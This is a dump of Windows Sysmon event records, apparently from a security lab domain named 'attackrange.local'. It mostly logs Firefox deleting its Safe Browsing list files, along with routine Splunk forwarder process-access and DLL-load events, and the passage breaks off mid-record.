23542300x800000000000000021219934Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.690{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=348F3BBEC6FFF1E54B3A461DDE3FBD93,SHA256=80325DB8766BC9A982601C4A35C293B05EE1A64C2E4B72A6E20FE763DBFD7526,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 534500x800000000000000057350610Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.769{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 10341000x800000000000000057350609Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.769{8B6011A9-5BBE-618E-66F3-04000000F101}8512664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057350608Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.769{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057350607Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.769{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 23542300x800000000000000057350606Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.769{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=B50CF628E0082A7840D84D0CBE1CAD48,SHA256=544DF79BCEF9DC8E082021E342C2A1B12CD0B8BDAF3687E0F23785406EDF33AEfalsetrue 23542300x800000000000000057350605Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.753{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=F130C472E963FF3CEED251C65964B927,SHA256=E5D2A5BBE8AA43751EF7F7BC3A817A0963D56272A4C9B6055E60929606186CE2falsetrue 23542300x800000000000000057350604Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.753{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=5F93E0F827909390D257EBB27C77F392,SHA256=5BCB684F3EE3B2EC2F4945655FBEF281C487399D6BF90451647DB1761715D4C8falsetrue 23542300x800000000000000057350603Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.753{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=9275B832091D9E3BFE50898A3BE022B5,SHA256=38C52A5435B625083000A054489B95E033F7B352377510DF668CEE749DE5803Efalsetrue 23542300x800000000000000057350602Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.753{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=8AC8A05028631170937EDA4CF0E0A35A,SHA256=456AB2C0E4E117D62DC529362EB22C725D410098868442729ADE5E4FF0822E78falsetrue 23542300x800000000000000057350601Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.753{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=7BBA9B83F0F213C5A723209D4C9962CE,SHA256=E1B8E7DEB0F34EEB6BF4D10E47E734A1FE829C365DF360B98646D7E11F2DD4C7falsetrue 23542300x800000000000000057350600Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.753{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=16BF2AA546411BA25DC80EA288D47143,SHA256=524EC56C023155C7BE4C84D5AEC4FE2D85DFBAB3C2FA27F82BCD35028D546F83falsetrue 23542300x800000000000000057350599Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.753{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=69EE5B232870704AFCC0E8957AA42A0F,SHA256=EC8DF5279022B68C0B542EC1688889374754106DFADBF7CAF8337E3F98865941falsetrue 23542300x800000000000000057350598Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.753{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=83BCEF27E5B36115C2ADBA73CE9A7D2B,SHA256=3F68B0FEFBD484094D6517761B2DC13C6A430DDE3B44FA6CCACA3E39052D2AADfalsetrue 23542300x800000000000000057350597Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.753{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=177BC07ECED26CEBE0441C318BD35BB8,SHA256=2A816C802C006DF75CA86E1497E4CF05DFB0F07DB0CD31C0EC30EDAF92C2DF75falsetrue 23542300x800000000000000057350596Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.753{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BCfalsetrue 23542300x800000000000000057350595Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.753{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0falsetrue 23542300x800000000000000057350594Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.737{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpsetMD5=C9814AD6F52FBE7BE1A697077DA8BC15,SHA256=7B17304E34C3002B272AC7630DC1BC53A46673867F5342565860C9C6D5E3EB55falsetrue 23542300x800000000000000057350593Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.737{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=DFB4DAA501A3CFBD25D68591A665C859,SHA256=268132EF4B1977DE86EC57120642417C6C46B057573CA17012F2236549FDD876falsetrue 23542300x800000000000000057350592Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.737{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpsetMD5=4A89DA2FED587C38CEABCDF3148D9119,SHA256=F56A47748378569F07C6F962501A82881110CAC374FB80992BB1575F48782556falsetrue 23542300x800000000000000057350591Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.668{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=F4BE6F7B57CD8FC1AF3248C8A20627CC,SHA256=1CFFFCC2F155167AD174F00708C70E467AABB183D8858A12D34A7FD359F4DFE7falsetrue 23542300x800000000000000057350590Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.668{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpsetMD5=3B3D51F3D63E276193A99D8B3A886C9E,SHA256=B3C27B80B01C942BFF6D3C51012773204F73F15A88CD6DA6F3BCA304FB0189F0falsetrue 23542300x800000000000000057350589Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.668{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=3E01CB8FF62235915E7D139DA52640D4,SHA256=856B42F8E7265F1B2A8EAC14D2BA6E89DA8EBEFB17A067159B3A0118A80EA1F3falsetrue 23542300x800000000000000057350588Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.668{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpsetMD5=B0272F5CF9F56F11C856155DC5F40BE1,SHA256=74AB81A1929A8806D559A13140947F076CABA52BF882364C416EF4D8E9B155F4falsetrue 23542300x800000000000000057350587Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.668{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadataMD5=8C97BFC724D668A0F321621818228D71,SHA256=7A3FC2BFBCFDA4E3921FAFB933B2583BBD8163F31BA6C81D92CB5F3DE588992Bfalsetrue 23542300x800000000000000057350586Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.668{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpsetMD5=B8B590F2C3BD0825D9CFF82AD03519E3,SHA256=0DFEF4450D65F661FD9ED24B9A7E5215A711F23B8171CC54E02811266D337A92falsetrue 23542300x800000000000000057350585Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.653{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=E60B3ADA99F59467AA1DCDB81E7846B0,SHA256=2B89DA2B0BA847C7B0317DCCC27187A0363056E45FC0D648A944AC2948B77D8Efalsetrue 23542300x800000000000000057350584Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.653{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1Efalsetrue 23542300x800000000000000057350583Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.653{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=FEC9BC354A7EE92C6FEEFE63E6B0FA26,SHA256=258EF8E6994A09FFB54BD0D5AFEC97C13C31F2EEFB7FE90A2A4C487C87817519falsetrue 23542300x800000000000000057350582Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.653{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97falsetrue 23542300x800000000000000057350581Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5falsetrue 23542300x800000000000000057350580Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49falsetrue 23542300x800000000000000057350579Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761falsetrue 23542300x800000000000000057350578Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25falsetrue 23542300x800000000000000057350577Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571Cfalsetrue 23542300x800000000000000057350576Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=07FF16BA9846838DA27AE094A1B91369,SHA256=DC83AE90504AC11C29876CFC48483976397E899958EE8EDE7F381971A2C2C4B9falsetrue 23542300x800000000000000057350575Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=1B9A162CEB3C7BE8393CE348F35A4564,SHA256=2D6B6351BD1B8C2047DA1854D0033EE6C5CD9F1BFE38C5E1A2B82C86AFE8A598falsetrue 23542300x800000000000000057350574Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97Ffalsetrue 23542300x800000000000000057350573Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722Cfalsetrue 23542300x800000000000000057350572Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460falsetrue 23542300x800000000000000057350571Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6Dfalsetrue 23542300x800000000000000057350570Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=BF6C363FCFE18836F5B693AC897B03D0,SHA256=3436668289A12D65E3C22BC60B8E2EA8D2D6CF15DF1402FCB3C16DD875D438E9falsetrue 23542300x800000000000000057350569Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=D5F2E2EC2D972EA4E3BD5E52478574EC,SHA256=5A9F549160D35C4F4CCD6CC4EF4B63FF1A8859F8374AEA866A10F61DC2559E58falsetrue 23542300x800000000000000057350568Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=82E921320B62879B070EBE9D8F1F4256,SHA256=A781BFF04964067CB06EA80DA605A4A2837F7256580693C6DBDCA971D8C9BDB0falsetrue 23542300x800000000000000057350567Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=BB9BB51CB484CC5719D210D53CF37762,SHA256=1903A36C25AEB3C61953484ED931ED52AB4A3BD13FCC38046154A6681472D499falsetrue 23542300x800000000000000057350566Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.637{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=C18D748EA4EC42607B01F62BD69CFCCA,SHA256=C3D2FA87A01F8DBA161F97959CC08E146AED0F15A3CCBD94B7019A4DBF2A14EEfalsetrue 23542300x800000000000000057350565Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.636{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=1FC7B2422CDE492733C09B15532720CD,SHA256=B3924A454B89471C1B26B69C90B4E1FC468B75BE378E7A1646CB1DF30AE59BDEfalsetrue 23542300x800000000000000057350564Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.635{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7falsetrue 23542300x800000000000000057350563Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.634{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761falsetrue 23542300x800000000000000057350562Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.633{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=10DF08FF9D77ACBF8F2BFB88B4BF1E3E,SHA256=4CC64D82E2EE876BA287302C877554B9D226416AF66CDF9C0350DBB845433881falsetrue 23542300x800000000000000057350561Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.632{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=E1E560A4EAE533286AEA5189E628BBCA,SHA256=0E5F9C474D34A165AF58EFB90E76E2CEDAE8A3E4FC29A6D9B9E2CFAEACD88A0Ffalsetrue 11241100x800000000000000057350560Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.600{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadata2021-11-12 12:19:09.175 23542300x800000000000000057350559Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.600{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla 